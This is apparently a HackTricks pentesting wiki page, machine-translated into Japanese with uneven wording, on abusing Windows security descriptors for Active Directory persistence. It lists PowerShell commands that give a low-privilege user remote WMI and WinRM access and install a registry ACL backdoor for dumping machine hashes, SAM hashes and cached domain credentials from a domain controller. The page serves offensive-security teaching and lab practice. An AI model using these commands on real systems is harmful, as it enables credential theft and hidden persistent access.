Security Descriptors

Support HackTricks

セキュリティ記述子

From the docs: セキュリティ記述子定義言語 (SDDL) は、セキュリティ記述子を記述するために使用されるフォーマットを定義します。SDDLはDACLおよびSACLのためにACE文字列を使用します: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

セキュリティ記述子は、オブジェクト持つ****権限保存するために使用されます。オブジェクトのセキュリティ記述子少しの変更を加えることができれば、そのオブジェクトに対して非常に興味深い権限を取得することができ、特権グループのメンバーである必要はありません。

この永続性技術は、特定のオブジェクトに対して必要なすべての権限を獲得する能力に基づいており、通常は管理者権限を必要とするタスクを、管理者である必要なく実行できるようにします。

WMIへのアクセス

ユーザーにリモートでWMIを実行するアクセスを与えることができます using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

winrm PSコンソールへのアクセスをユーザーに与える これを使用して:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

ハッシュへのリモートアクセス

レジストリにアクセスし、DAMPを使用してハッシュをダンプし、いつでもコンピュータのハッシュSAM、およびコンピュータ内の任意のキャッシュされたAD資格情報を取得できるRegバックドアを作成します。したがって、これはドメインコントローラコンピュータに対して通常のユーザーにこの権限を与えるのに非常に便利です:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

チェックしてみてください Silver Tickets ドメインコントローラーのコンピューターアカウントのハッシュをどのように使用できるかを学ぶために。

HackTricksをサポートする

Last updated